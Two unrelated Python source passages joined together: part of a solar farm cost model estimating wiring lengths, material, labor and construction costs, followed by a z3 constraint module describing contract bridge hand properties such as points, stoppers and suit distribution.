Calculate number of modules per string based on module V_oc and inverter max
MPPT DC voltage
"""
number_modules_per_string = math.floor(self.input_dict['inverter_max_mppt_V_DC'] /
self.input_dict['module_V_oc'])
# string open circuit voltage (used later in VD% calculations):
self.output_dict['string_V_oc'] = number_modules_per_string * \
self.input_dict['module_V_oc']
return number_modules_per_string
def num_strings_per_row(self):
"""
Combined number of strings from both sub rows
"""
number_panels_along_x = self.number_panels_along_x()
# Multiplying by 2 since there are 2 sub rows per row
num_strings_per_row = 2 * math.floor(number_panels_along_x /
self.number_modules_per_string())
return num_strings_per_row
def distance_to_combiner_box(self, number_of_strings):
"""
Cumulative distance to combiner box at end of each row for all strings in a
row. Note that this is only the cumulative length of source circuits for 1 of
the 2 sub rows in a row. Remember that each row has 2 panels in portrait
orientation stacked end-to-end. Multiply result obtained form this method by
2 to get total cumulative length of source circuit wire for entire row.
"""
distance_to_combiner_box = 0 # initialize
number_modules_per_string = self.number_modules_per_string()
# Get module length (plus 1" width of mid clamp):
module_width_m = self.input_dict['module_width_m'] + self.inch_to_m
number_of_strings_per_sub_row = int(number_of_strings / 2)
for i in range(number_of_strings_per_sub_row):
if 0 == i:
# Distance of terminal module in 1st string from combiner box:
distance_to_combiner_box = (i + 1) * module_width_m * \
number_modules_per_string
adder = distance_to_combiner_box + module_width_m
else:
# Where adder is the first module in subsequent strings
distance_to_combiner_box += adder + ((i + 1) * module_width_m *
number_modules_per_string)
adder = ((i + 1) * module_width_m * number_modules_per_string) + \
module_width_m
return distance_to_combiner_box
def source_circuit_wire_length_lf(self,
num_strings_per_row,
number_rows_per_subquadrant):
"""
Determine total source circuit wire length for each quadrant
"""
distance_to_combiner_box_per_row = \
self.distance_to_combiner_box(num_strings_per_row)
# Multiply by 2 since there are 2 sets of rows in a quadrant:
source_circuit_wire_length_m = distance_to_combiner_box_per_row * \
number_rows_per_subquadrant * 2
source_circuit_wire_length_lf = source_circuit_wire_length_m * self.m_to_lf
return source_circuit_wire_length_lf
def source_circuit_wire_length_total_lf(self, source_circuit_wire_length_lf,
num_quadrants):
"""
Returns combined source circuit wire length for all quadrants combined. This
includes length of wire in each sub row of each sub quadrant.
Accordingly, length of wire for both sub rows of every row, and both sub
quadrants of a quadrant has been accounted for up till this point.
"""
source_circuit_wire_length_total_lf = \
source_circuit_wire_length_lf * num_quadrants
self.output_dict['source_circuit_wire_length_total_lf'] = \
source_circuit_wire_length_total_lf
return source_circuit_wire_length_total_lf
def pv_wire_cost(self, system_size_MW_DC, circuit_type, circuit_amps):
"""
Empirical curve fit of pv wire cost ($/LF) for AWG #10 wire or smaller.
"""
        if system_size_MW_DC > 500:
            volume_order_discount_multiplier = 0.50  # 50 % discount (volume pricing)
        elif system_size_MW_DC > 300:
            volume_order_discount_multiplier = 0.70  # 30 % discount (volume pricing)
        elif system_size_MW_DC > 150:
            volume_order_discount_multiplier = 0.75  # 25 % discount (volume pricing)
        elif system_size_MW_DC > 50:
            volume_order_discount_multiplier = 0.80  # 20 % discount (volume pricing)
        elif system_size_MW_DC > 20:
            volume_order_discount_multiplier = 0.90  # 10 % discount (volume pricing)
        else:
            volume_order_discount_multiplier = 1
pv_wire_DC_specs = self.input_dict['pv_wire_DC_specs']
        if circuit_type == 'source_circuit':
cost_usd_lf = pv_wire_DC_specs.loc[
pv_wire_DC_specs['Size (AWG or kcmil)'] == 10, 'Cost (USD/LF)']
cost_usd_lf = cost_usd_lf.iloc[0]
        elif circuit_type == 'output_circuit':
if circuit_amps >= 175:
cost_usd_lf = \
pv_wire_DC_specs.loc[
pv_wire_DC_specs['Temperature Rating of Conductor at 75°C ' \
'(167°F) in Amps'] == 175, 'Cost (USD/LF)']
else:
cost_usd_lf = \
pv_wire_DC_specs.loc[
pv_wire_DC_specs['Temperature Rating of Conductor at 75°C ' \
'(167°F) in Amps'] == 150, 'Cost (USD/LF)']
cost_usd_lf = cost_usd_lf.iloc[0]
pv_wire_cost = cost_usd_lf * volume_order_discount_multiplier # $/LF
return pv_wire_cost
# <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
# Output circuit calculations:
def number_strings_quadrant(self, num_strings_per_row, num_rows_per_subquadrant):
"""
Get number of strings in each quadrant
"""
number_strings_quadrant = num_strings_per_row * num_rows_per_subquadrant * 2
return number_strings_quadrant
def num_strings_parallel(self, num_strings_per_row):
"""
Starting with the highest allowable number of strings in parallel as possible.
This is to ensure highest possible output circuit ampacity, which would lead
to lowest possible max allowable circuit resistance.
"""
if num_strings_per_row > 24:
num_strings_parallel = 24
else:
num_strings_parallel = num_strings_per_row
return int(num_strings_parallel)
def output_circuit_ampacity(self, num_strings_in_parallel):
"""
"""
string_short_circuit_current = self.input_dict['module_I_SC_DC']
# Consider 25% safety factor for over irradiance / over-current scenarios
over_current_factor = 1.25
output_circuit_ampacity = over_current_factor * \
string_short_circuit_current * \
num_strings_in_parallel
return output_circuit_ampacity
def row_spacing_m(self, quadrant_length_m, number_rows_per_subquadrant):
"""
"""
row_spacing_m = quadrant_length_m / number_rows_per_subquadrant
return row_spacing_m
def voltage_drop_V(self):
"""
Returns maximum allowable Voltage drop (in V) in an output circuit based on
NEC guidelines.
"""
voltage_drop_V = self.allowable_vd_percent * self.output_dict['string_V_oc']
return voltage_drop_V
def VD_passes(self,
circuit_length_m,
wire_R_per_kft,
max_VD,
output_circuit_ampacity):
"""
Once the wire has been picked based on its ampacity, call this method to
check whether the VD from using this wire exceeds 3%
"""
R = wire_R_per_kft * (1 / 1000) * (circuit_length_m * self.m_to_lf)
VD = R * output_circuit_ampacity
if VD > max_VD:
return False
else:
return True
def circular_mils_area(self, circuit_length, current, VD):
"""
Calculates the wire's circ mils area. This will help in selecting wire
appropriate for wiring (based on its ampacity and ohms/kFT)
"""
circular_mills_area = (circuit_length * self.Cu_specific_resistivity *
current) / VD
return circular_mills_area
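    # Illustrative example (assuming circuit_length is in feet, as the
    # K = 11 ohm-cmil/ft copper constant implies): a 300 ft circuit carrying
    # 100 A with a 14 V allowable drop needs (300 * 11 * 100) / 14 ~ 23,600 cmil.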
def estimate_construction_time(self):
"""
        Function to estimate construction time for the project's collection system.
Parameters
-------
duration_construction
pd.DataFrame
construction_estimator
pd.DataFrame
trench_length_km
Returns
-------
(pd.DataFrame) operation_data
"""
# assumes collection construction occurs for 45 % of project duration
collection_construction_time = self.input_dict[
'construction_time_months'] * 0.45
throughput_operations = self.input_dict['construction_estimator']
trench_length_km = self.output_dict['trench_length_km']
operation_data = throughput_operations.where(
throughput_operations['Module'] == 'Collection').dropna(thresh=4)
source_wiring_operations = throughput_operations.where(
throughput_operations['Module'] == 'Source circuit wiring').dropna(thresh=4)
output_wiring_operations = throughput_operations.where(
throughput_operations['Module'] == 'Output circuit wiring').dropna(thresh=4)
# from construction_estimator data, only read in Collection related data and
# filter out the rest:
cable_trenching = throughput_operations[throughput_operations.Module == 'Collection']
source_wiring = throughput_operations[throughput_operations.Module == 'Source circuit wiring']
output_wiring = throughput_operations[throughput_operations.Module == 'Output circuit wiring']
# Storing data with labor related inputs:
trenching_labor = cable_trenching[cable_trenching.values == 'Labor']
trenching_labor_usd_per_hr = trenching_labor['Rate USD per unit'].sum()
self.output_dict['trenching_labor_usd_per_hr'] = trenching_labor_usd_per_hr
# Units: LF/day -> where LF = Linear Foot
trenching_labor_daily_output = trenching_labor['Daily output'].values[0]
trenching_labor_num_workers = trenching_labor['Number of workers'].sum()
# Get labor daily output for source circuit wiring:
source_wiring_labor = source_wiring[source_wiring.Module == 'Source circuit wiring']
source_circuit_daily_output = source_wiring_labor.loc[
source_wiring_labor['Operation ID'] == 'Source circuit wiring', 'Daily output']
source_circuit_daily_output = source_circuit_daily_output.iloc[0]
self.output_dict['source_circuit_daily_output'] = source_circuit_daily_output
# Get labor daily output for output circuit wiring:
output_wiring_labor = output_wiring[output_wiring.Module == 'Output circuit wiring']
output_circuit_daily_output = output_wiring_labor.loc[
output_wiring_labor['Operation ID'] == 'Output circuit wiring', 'Daily output']
output_circuit_daily_output = output_circuit_daily_output.iloc[0]
self.output_dict['output_circuit_daily_output'] = output_circuit_daily_output
# Storing data with equipment related inputs:
trenching_equipment = cable_trenching[cable_trenching.values == 'Equipment']
trenching_cable_equipment_usd_per_hr = trenching_equipment['Rate USD per unit'].sum()
self.output_dict['trenching_cable_equipment_usd_per_hr'] = \
trenching_cable_equipment_usd_per_hr
# Units: LF/day -> where LF = Linear Foot
trenching_equipment_daily_output = trenching_equipment['Daily output'].values[0]
self.output_dict['trenching_labor_daily_output'] = trenching_labor_daily_output
self.output_dict['trenching_equipment_daily_output'] = trenching_equipment_daily_output
operation_data['Number of days taken by single crew'] = \
((trench_length_km * self._km_to_LF) / trenching_labor_daily_output)
operation_data['Number of crews'] = \
np.ceil((operation_data['Number of days taken by single crew'] / 30) /
collection_construction_time)
operation_data['Cost USD without weather delays'] = \
((trench_length_km * self._km_to_LF) / trenching_labor_daily_output) * \
(operation_data['Rate USD per unit'] * self.input_dict['hour_day'])
# Repeat above steps, for cost of source circuit wiring
source_wiring_operations['Number of days taken by single crew'] = \
self.output_dict['source_circuit_wire_length_total_lf'] / source_circuit_daily_output
source_wiring_operations['Number of crews'] = \
np.ceil((source_wiring_operations['Number of days taken by single crew'] / 30) /
collection_construction_time)
source_wiring_operations['Cost USD without weather delays'] = \
self.output_dict['source_circuit_wire_length_total_lf'] * \
source_wiring_operations['Rate USD per unit']
self.output_dict['source_wiring_USD_lf'] = \
source_wiring_operations['Rate USD per unit'].iloc[0]
# Repeat above steps, for cost of output circuit wiring
output_wiring_operations['Number of days taken by single crew'] = \
self.output_dict['output_circuit_wire_length_total_lf'] / output_circuit_daily_output
output_wiring_operations['Number of crews'] = \
np.ceil((output_wiring_operations['Number of days taken by single crew'] / 30) /
collection_construction_time)
output_wiring_operations['Cost USD without weather delays'] = \
self.output_dict['output_circuit_wire_length_total_lf'] * \
output_wiring_operations['Rate USD per unit']
self.output_dict['output_wiring_USD_lf'] = \
output_wiring_operations['Rate USD per unit'].iloc[0]
alpha = operation_data[operation_data['Type of cost'] == 'Labor']
operation_data_id_days_crews_workers = alpha[['Operation ID',
'Number of days taken by single crew',
'Number of crews',
'Number of workers']]
source_wiring_alpha = source_wiring_operations[source_wiring_operations['Type of cost'] == 'Labor']
source_wiring_id_days_crews_workers = source_wiring_alpha[['Operation ID',
'Number of days taken by single crew',
'Number of crews',
'Number of workers']]
output_wiring_alpha = output_wiring_operations[output_wiring_operations['Type of cost'] == 'Labor']
output_wiring_id_days_crews_workers = output_wiring_alpha[['Operation ID',
'Number of days taken by single crew',
'Number of crews',
'Number of workers']]
operation_data_id_days_crews_workers = pd.merge(operation_data_id_days_crews_workers,
source_wiring_id_days_crews_workers,
how='outer')
operation_data_id_days_crews_workers = pd.merge(operation_data_id_days_crews_workers,
output_wiring_id_days_crews_workers,
how='outer')
operation_data = pd.merge(operation_data, source_wiring_operations, how='outer')
operation_data = pd.merge(operation_data, output_wiring_operations, how='outer')
# if more than one crew needed to complete within construction duration then
# assume that all construction happens within that window and use that timeframe
# for weather delays;
# if not, use the number of days calculated
operation_data['time_construct_bool'] = \
operation_data['Number of days taken by single crew'] > \
(collection_construction_time * 30)
        boolean_dictionary = {True: collection_construction_time * 30, False: np.nan}
operation_data['time_construct_bool'] = \
operation_data['time_construct_bool'].map(boolean_dictionary)
operation_data['Time construct days'] = \
operation_data[['time_construct_bool',
'Number of days taken by single crew']].min(axis=1)
self.output_dict['num_days'] = operation_data['Time construct days'].max()
        self.output_dict['management_crew_cost_before_wind_delay'] = 0
self.output_dict['operation_data_id_days_crews_workers'] = \
operation_data_id_days_crews_workers
self.output_dict['operation_data_entire_farm'] = operation_data
return self.output_dict['operation_data_entire_farm']
def calculate_costs(self):
# Read in construction_estimator data:
# construction_estimator = input_dict['construction_estimator']
operation_data = self.output_dict['operation_data_entire_farm']
per_diem = operation_data['Number of workers'] * \
operation_data['Number of crews'] * \
(operation_data['Time construct days'] +
np.ceil(operation_data['Time construct days'] / 7)) * \
self.input_dict['construction_estimator_per_diem']
per_diem = per_diem.dropna()
self.output_dict['time_construct_days'] = \
(self.output_dict['trench_length_km'] * self._km_to_LF) / \
self.output_dict['trenching_labor_daily_output']
# weather based delays not yet implemented in SolarBOSSE
self.output_dict['wind_multiplier'] = 1 # Placeholder
# Calculating trenching cost:
self.output_dict['Days taken for trenching (equipment)'] = \
(self.output_dict['trench_length_km'] * self._km_to_LF) / \
self.output_dict['trenching_equipment_daily_output']
        self.output_dict['Equipment cost of trenching per day (usd/day)'] = \
self.output_dict['trenching_cable_equipment_usd_per_hr'] * \
self.input_dict['hour_day']
self.output_dict['Equipment Cost USD without weather delays'] = \
self.output_dict['Days taken for trenching (equipment)'] * \
            self.output_dict['Equipment cost of trenching per day (usd/day)']
self.output_dict['Equipment Cost USD with weather delays'] = \
self.output_dict['Equipment Cost USD without weather delays'] * \
self.output_dict['wind_multiplier']
trenching_equipment_rental_cost_df = \
pd.DataFrame([['Equipment rental',
self.output_dict['Equipment Cost USD with weather delays'],
'Collection']],
columns=['Type of cost',
'Cost USD',
'Phase of construction'])
# Calculating trenching labor cost:
self.output_dict['Days taken for trenching (labor)'] = \
((self.output_dict['trench_length_km'] * self._km_to_LF) /
self.output_dict['trenching_labor_daily_output'])
self.output_dict['days_taken_source_wiring'] = \
self.output_dict['source_circuit_wire_length_total_lf'] / \
self.output_dict['source_circuit_daily_output']
self.output_dict['days_taken_output_wiring'] = \
self.output_dict['output_circuit_wire_length_total_lf'] / \
self.output_dict['output_circuit_daily_output']
self.output_dict['Labor cost of trenching per day (usd/day)'] = \
(self.output_dict['trenching_labor_usd_per_hr'] *
self.input_dict['hour_day'] *
self.input_dict['overtime_multiplier'])
self.output_dict['Labor cost of source wiring per day (usd/day)'] = \
(self.output_dict['source_circuit_daily_output'] *
self.output_dict['source_wiring_USD_lf'] *
self.input_dict['overtime_multiplier'])
self.output_dict['Labor cost of output wiring per day (usd/day)'] = \
(self.output_dict['output_circuit_daily_output'] *
self.output_dict['output_wiring_USD_lf'] *
self.input_dict['overtime_multiplier'])
self.output_dict['Total per diem costs (USD)'] = per_diem.sum()
self.output_dict['Labor Cost USD without weather delays'] = \
((self.output_dict['Days taken for trenching (labor)'] *
self.output_dict['Labor cost of trenching per day (usd/day)']
) +
(self.output_dict['Labor cost of source wiring per day (usd/day)'] *
self.output_dict['days_taken_source_wiring']
) +
(self.output_dict['Labor cost of output wiring per day (usd/day)'] *
self.output_dict['days_taken_output_wiring']
) +
(self.output_dict['Total per diem costs (USD)'] +
             self.output_dict['management_crew_cost_before_wind_delay']
))
self.output_dict['Labor Cost USD with weather delays'] = \
self.output_dict['Labor Cost USD without weather delays'] * \
self.output_dict['wind_multiplier']
trenching_labor_cost_df = pd.DataFrame([['Labor',
self.output_dict['Labor Cost USD with weather delays'],
'Collection']],
columns=['Type of cost',
'Cost USD',
'Phase of construction'])
# Calculate cable cost:
cable_cost_usd_per_LF_df = pd.DataFrame([['Materials',
self.output_dict['total_material_cost'],
'Collection']],
columns=['Type of cost',
'Cost USD',
'Phase of construction'])
# Combine all calculated cost items into the 'collection_cost' data frame:
collection_cost = pd.DataFrame([], columns=['Type of cost',
'Cost USD',
'Phase of construction'])
        collection_cost = pd.concat([collection_cost,
                                     trenching_equipment_rental_cost_df,
                                     trenching_labor_cost_df,
                                     cable_cost_usd_per_LF_df])
# Calculate Mobilization Cost and add to collection_cost data frame:
equip_material_mobilization_multiplier = \
0.16161 * (self.input_dict['system_size_MW_DC'] ** (-0.135))
material_mobilization_USD = self.output_dict['total_material_cost'] * \
equip_material_mobilization_multiplier
equipment_mobilization_USD = \
self.output_dict['Equipment Cost USD with weather delays'] * \
equip_material_mobilization_multiplier
labor_mobilization_multiplier = \
1.245 * (self.input_dict['system_size_MW_DC'] ** (-0.367))
labor_mobilization_USD = \
self.output_dict['Labor Cost USD with weather delays'] * \
labor_mobilization_multiplier
collection_mobilization_usd = material_mobilization_USD + \
equipment_mobilization_USD + \
labor_mobilization_USD
mobilization_cost = pd.DataFrame([['Mobilization',
                                           collection_mobilization_usd,
'Collection']],
columns=['Type of cost',
'Cost USD',
'Phase of construction'])
        collection_cost = pd.concat([collection_cost, mobilization_cost])
self.output_dict['total_collection_cost_df'] = collection_cost
self.output_dict['total_collection_cost'] = collection_cost['Cost USD'].sum()
return self.output_dict['total_collection_cost']
def run_module_for_150_MW(self):
"""
Runs the CollectionCost module and populates the IO dictionaries with
calculated values.
Parameters
----------
<None>
Returns
-------
tuple
First element of tuple contains a 0 or 1. 0 means no errors happened
and 1 means an error happened and the module failed to run. The second
element either returns a 0 if the module ran successfully, or it returns
the error raised that caused the failure.
"""
# l = length ; w = width
project_l_m, project_w_m = self.land_dimensions()
l, w = self.get_quadrant_dimensions()
num_quadrants = len(self.inverter_list())
number_rows_per_subquadrant = self.number_rows_per_subquadrant()
num_strings_per_row = self.num_strings_per_row()
source_circuit_wire_length_lf =\
self.source_circuit_wire_length_lf(num_strings_per_row,
number_rows_per_subquadrant)
source_circuit_wire_length_total_lf = \
self.source_circuit_wire_length_total_lf(source_circuit_wire_length_lf,
num_quadrants)
self.output_dict['source_circuit_wire_length_total_lf'] = \
source_circuit_wire_length_total_lf
# Begin output circuit calculations:
num_strings_per_quadrant = \
self.number_strings_quadrant(num_strings_per_row,
number_rows_per_subquadrant)
num_strings_parallel = self.num_strings_parallel(num_strings_per_row)
row_spacing_m = self.row_spacing_m(l, number_rows_per_subquadrant)
# make a list of rows in each quadrant:
        all_rows = [n for n in range(number_rows_per_subquadrant)]
        # Separate list (not an alias of all_rows) to hold per-row circuit lengths:
        row_out_circuit_length_m = [0.0] * number_rows_per_subquadrant
# starting with the bottom-most row in a quadrant (which is also the
# farthest row from the inverter.
total_out_circuit_length_m = 0 # Initialize
for row in all_rows:
row_inverter_distance_m = ((number_rows_per_subquadrant - 1) - row) * \
row_spacing_m
row_out_circuit_length_m[row] = row_inverter_distance_m * 2
total_out_circuit_length_m += row_out_circuit_length_m[row]
# total output circuit length for quadrant (2 sub quadrants per quadrant):
TOC_length_quadrant_m = total_out_circuit_length_m * 2
        # Total output circuit length for the entire farm (all quadrants combined):
output_circuit_wire_length_total_lf = \
TOC_length_quadrant_m * self.m_to_lf * num_quadrants
self.output_dict[
'output_circuit_wire_length_total_lf'] = output_circuit_wire_length_total_lf
# Trench length for project (all quadrants combined):
self.output_dict['trench_length_km'] = (project_l_m / 1000) * 2 # 2 trenches
# Series of methods to select the right cable for output circuit:
# Not using this set of implementations for now. That is, I'm assuming the
# cable selected based solely on circuit ampacity also satisfies the 3 %
# VD (max) requirement.
# longest_output_circuit_m = row_out_circuit_length_m[0]
# max_voltage_drop_V = self.voltage_drop_V()
# self.VD_passes(longest_output_circuit_m, max_voltage_drop_V,
# output_circuit_ampacity)
output_circuit_ampacity = self.output_circuit_ampacity(num_strings_parallel)
total_material_cost = source_circuit_wire_length_total_lf * \
self.pv_wire_cost(self.input_dict['system_size_MW_DC'],
'source_circuit',
self.input_dict['module_I_SC_DC'])
total_material_cost += TOC_length_quadrant_m * self.m_to_lf * num_quadrants * \
self.pv_wire_cost(self.input_dict['system_size_MW_DC'],
'output_circuit',
output_circuit_ampacity)
self.output_dict['total_material_cost'] = total_material_cost
self.estimate_construction_time()
self.output_dict['total_collection_cost'] = self.calculate_costs()
def run_module(self):
"""
"""
try:
original_site_prep_area_acres = self.input_dict['site_prep_area_acres']
regions_list = []
region_iter = 0
total_collection_cost = 0
if self.input_dict['system_size_MW_DC'] > 150:
site_prep_area_regions = self.input_dict['system_size_MW_DC'] / 150
fraction_site_prep_area_regions = site_prep_area_regions - \
math.floor(site_prep_area_regions)
region_iter = math.floor(site_prep_area_regions)
for i in range(region_iter):
regions_list.append(150) # Stores size (in MW) of the region
if fraction_site_prep_area_regions > 0:
regions_list.append(fraction_site_prep_area_regions * 150)
for region in regions_list:
# Should be site_prep_area_acres_mw_dc and not site_prep_area_acres_mw_ac
self.input_dict['site_prep_area_acres'] = \
self.input_dict['site_prep_area_acres_mw_ac'] * region
self.run_module_for_150_MW()
total_collection_cost += self.output_dict['total_collection_cost']
else:
self.run_module_for_150_MW()
total_collection_cost += self.output_dict['total_collection_cost']
self.input_dict['site_prep_area_acres'] = original_site_prep_area_acres
self.output_dict['total_collection_cost'] = total_collection_cost
# self.output_dict['total_collection_cost'] = 65153571
return 0, 0 # module ran successfully
except Exception as error:
traceback.print_exc()
print(f"Fail {self.project_name} CollectionCost")
self.input_dict['error']['CollectionCost'] = error
return 1, error # module did not run successfully
| python |
# Copyright (c) 2013 The SAYCBridge Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from z3b import enum
import core.suit as suit
import z3
_honor_names = ('ace', 'king', 'queen', 'jack', 'ten')
_honor_values = (4, 3, 2, 1, 0)
def _honor_vars(suit):
    # Return a list (reusable, unlike a one-shot map iterator) of one Int var per honor.
    return [z3.Int("{}_of_{}".format(honor_name, suit.name.lower())) for honor_name in _honor_names]
def _suit_count_var(suit):
return z3.Int(suit.name.lower())
clubs, diamonds, hearts, spades = map(_suit_count_var, suit.SUITS)
def expr_for_suit(suit):
return (clubs, diamonds, hearts, spades)[suit.index]
ace_of_spades, king_of_spades, queen_of_spades, jack_of_spades, ten_of_spades = _honor_vars(suit.SPADES)
ace_of_hearts, king_of_hearts, queen_of_hearts, jack_of_hearts, ten_of_hearts = _honor_vars(suit.HEARTS)
ace_of_diamonds, king_of_diamonds, queen_of_diamonds, jack_of_diamonds, ten_of_diamonds = _honor_vars(suit.DIAMONDS)
ace_of_clubs, king_of_clubs, queen_of_clubs, jack_of_clubs, ten_of_clubs = _honor_vars(suit.CLUBS)
high_card_points, points, playing_points = z3.Ints('high_card_points points playing_points')
points_supporting_spades, points_supporting_hearts, points_supporting_diamonds, points_supporting_clubs = z3.Ints(
'points_supporting_spades points_supporting_hearts points_supporting_diamonds points_supporting_clubs')
void_in_spades, void_in_hearts, void_in_diamonds, void_in_clubs = z3.Ints(
'void_in_spades void_in_hearts void_in_diamonds void_in_clubs')
singleton_in_spades, singleton_in_hearts, singleton_in_diamonds, singleton_in_clubs = z3.Ints(
'singleton_in_spades singleton_in_hearts singleton_in_diamonds singleton_in_clubs')
doubleton_in_spades, doubleton_in_hearts, doubleton_in_diamonds, doubleton_in_clubs = z3.Ints(
'doubleton_in_spades doubleton_in_hearts doubleton_in_diamonds doubleton_in_clubs')
voids, singletons, doubletons = z3.Ints('voids singletons doubletons')
def named_count_expr(count_name, count):
    suit_count_vars = list(map(expr_for_suit, suit.SUITS))
    suit_matches_count_vars = [z3.Int("%s_in_%s" % (count_name, s.name.lower())) for s in suit.SUITS] # void_in_spades, etc.
exprs = [
# FIXME: Can z3 support writing this as "void_in_spades == (spades == 0)"?
z3.Or(
z3.And(suit_count == count, suit_matches_count == 1),
z3.And(suit_count != count, suit_matches_count == 0),
)
for suit_count, suit_matches_count in zip(suit_count_vars, suit_matches_count_vars)
]
exprs.append(z3.Int(count_name + "s") == sum(suit_matches_count_vars))
return z3.And(*exprs)
def constrain_honors_expr():
exprs = []
for honor_suit in suit.SUITS:
# The easiest way to have an Int var and constrain it to bool values is to just:
# z3.And(0 <= ace_of_spades, ace_of_spades <= 1)
honor_vars = _honor_vars(honor_suit)
exprs.extend([z3.And(0 <= honor_var, honor_var <= 1) for honor_var in honor_vars])
# Also make sure that total number of honors is <= total number of cards
exprs.append(sum(honor_vars) <= expr_for_suit(honor_suit))
return z3.And(*exprs)
axioms = [
spades + hearts + diamonds + clubs == 13,
spades >= 0,
hearts >= 0,
diamonds >= 0,
clubs >= 0,
0 <= high_card_points, high_card_points <= 37,
points == high_card_points,
high_card_points <= playing_points,
playing_points <= 55, # Just to make the model finite.
named_count_expr('void', 0),
named_count_expr('singleton', 1),
named_count_expr('doubleton', 2),
constrain_honors_expr(),
z3.Or(
z3.And(spades <= 2, points_supporting_spades == high_card_points),
z3.And(spades == 3, points_supporting_spades == high_card_points + doubletons + 2 * singletons + 3 * voids),
z3.And(spades >= 4, points_supporting_spades == high_card_points + doubletons + 3 * singletons + 5 * voids),
),
z3.Or(
z3.And(hearts <= 2, points_supporting_hearts == high_card_points),
z3.And(hearts == 3, points_supporting_hearts == high_card_points + doubletons + 2 * singletons + 3 * voids),
z3.And(hearts >= 4, points_supporting_hearts == high_card_points + doubletons + 3 * singletons + 5 * voids),
),
z3.Or(
z3.And(diamonds <= 2, points_supporting_diamonds == high_card_points),
z3.And(diamonds == 3, points_supporting_diamonds == high_card_points + doubletons + 2 * singletons + 3 * voids),
z3.And(diamonds >= 4, points_supporting_diamonds == high_card_points + doubletons + 3 * singletons + 5 * voids),
),
z3.Or(
z3.And(clubs <= 2, points_supporting_clubs == high_card_points),
z3.And(clubs == 3, points_supporting_clubs == high_card_points + doubletons + 2 * singletons + 3 * voids),
z3.And(clubs >= 4, points_supporting_clubs == high_card_points + doubletons + 3 * singletons + 5 * voids),
),
sum([ # Sum the sums for all suits.
sum([ # Sum the honors for a single suit
a * b for a, b in zip(_honor_values, honor_vars)])
for honor_vars in map(_honor_vars, suit.SUITS)
]) == high_card_points, # The total is our hcp.
]
min_hcp_for_open = 8
def _expr_for_point_rule(count):
return z3.And(
high_card_points >= min_hcp_for_open,
playing_points >= 12,
z3.Or(
spades + hearts + high_card_points >= count,
spades + diamonds + high_card_points >= count,
spades + clubs + high_card_points >= count,
hearts + diamonds + high_card_points >= count,
hearts + clubs + high_card_points >= count,
diamonds + clubs + high_card_points >= count,
)
)
rule_of_twenty = _expr_for_point_rule(20)
rule_of_nineteen = _expr_for_point_rule(19)
# FIXME: This rule probably needs to consider min_hcp_for_open
rule_of_fifteen = z3.And(spades + high_card_points >= 15, high_card_points >= min_hcp_for_open, playing_points >= 12)
two_of_the_top_three_spades = ace_of_spades + king_of_spades + queen_of_spades >= 2
two_of_the_top_three_hearts = ace_of_hearts + king_of_hearts + queen_of_hearts >= 2
two_of_the_top_three_diamonds = ace_of_diamonds + king_of_diamonds + queen_of_diamonds >= 2
two_of_the_top_three_clubs = ace_of_clubs + king_of_clubs + queen_of_clubs >= 2
three_of_the_top_five_spades = ace_of_spades + king_of_spades + queen_of_spades + jack_of_spades + ten_of_spades >= 3
three_of_the_top_five_hearts = ace_of_hearts + king_of_hearts + queen_of_hearts + jack_of_hearts + ten_of_hearts >= 3
three_of_the_top_five_diamonds = ace_of_diamonds + king_of_diamonds + queen_of_diamonds + jack_of_diamonds + ten_of_diamonds >= 3
three_of_the_top_five_clubs = ace_of_clubs + king_of_clubs + queen_of_clubs + jack_of_clubs + ten_of_clubs >= 3
three_of_the_top_five_spades_or_better = z3.Or(two_of_the_top_three_spades, three_of_the_top_five_spades)
three_of_the_top_five_hearts_or_better = z3.Or(two_of_the_top_three_hearts, three_of_the_top_five_hearts)
three_of_the_top_five_diamonds_or_better = z3.Or(two_of_the_top_three_diamonds, three_of_the_top_five_diamonds)
three_of_the_top_five_clubs_or_better = z3.Or(two_of_the_top_three_clubs, three_of_the_top_five_clubs)
third_round_stopper_spades = z3.Or(ace_of_spades == 1, z3.And(king_of_spades == 1, spades >= 2), z3.And(queen_of_spades == 1, spades >= 3))
third_round_stopper_hearts = z3.Or(ace_of_hearts == 1, z3.And(king_of_hearts == 1, hearts >= 2), z3.And(queen_of_hearts == 1, hearts >= 3))
third_round_stopper_diamonds = z3.Or(ace_of_diamonds == 1, z3.And(king_of_diamonds == 1, diamonds >= 2), z3.And(queen_of_diamonds == 1, diamonds >= 3))
third_round_stopper_clubs = z3.Or(ace_of_clubs == 1, z3.And(king_of_clubs == 1, clubs >= 2), z3.And(queen_of_clubs == 1, clubs >= 3))
number_of_aces = ace_of_spades + ace_of_hearts + ace_of_diamonds + ace_of_clubs
number_of_kings = king_of_spades + king_of_hearts + king_of_diamonds + king_of_clubs
balanced = z3.And(doubletons <= 1, singletons == 0, voids == 0)
stopper_spades = z3.Or(ace_of_spades == 1, z3.And(king_of_spades == 1, spades >= 2), z3.And(queen_of_spades == 1, spades >= 3), z3.And(jack_of_spades == 1, ten_of_spades == 1, spades >= 4))
stopper_hearts = z3.Or(ace_of_hearts == 1, z3.And(king_of_hearts == 1, hearts >= 2), z3.And(queen_of_hearts == 1, hearts >= 3), z3.And(jack_of_hearts == 1, ten_of_hearts == 1, hearts >= 4))
stopper_diamonds = z3.Or(ace_of_diamonds == 1, z3.And(king_of_diamonds == 1, diamonds >= 2), z3.And(queen_of_diamonds == 1, diamonds >= 3), z3.And(jack_of_diamonds == 1, ten_of_diamonds == 1, diamonds >= 4))
stopper_clubs = z3.Or(ace_of_clubs == 1, z3.And(king_of_clubs == 1, clubs >= 2), z3.And(queen_of_clubs == 1, clubs >= 3), z3.And(jack_of_clubs == 1, ten_of_clubs == 1, clubs >= 4))
NO_CONSTRAINTS = z3.BoolVal(True)
def stopper_expr_for_suit(suit):
return (
stopper_clubs,
stopper_diamonds,
stopper_hearts,
stopper_spades,
)[suit.index]
def support_points_expr_for_suit(suit):
return (
points_supporting_clubs,
points_supporting_diamonds,
points_supporting_hearts,
points_supporting_spades,
)[suit.index]
def expr_for_hand(hand):
cards_in_spades = hand.cards_in_suit(suit.SPADES)
cards_in_hearts = hand.cards_in_suit(suit.HEARTS)
cards_in_diamonds = hand.cards_in_suit(suit.DIAMONDS)
cards_in_clubs = hand.cards_in_suit(suit.CLUBS)
return z3.And(
spades == len(cards_in_spades),
hearts == len(cards_in_hearts),
diamonds == len(cards_in_diamonds),
clubs == len(cards_in_clubs),
ace_of_spades == int('A' in cards_in_spades),
king_of_spades == int('K' in cards_in_spades),
queen_of_spades == int('Q' in cards_in_spades),
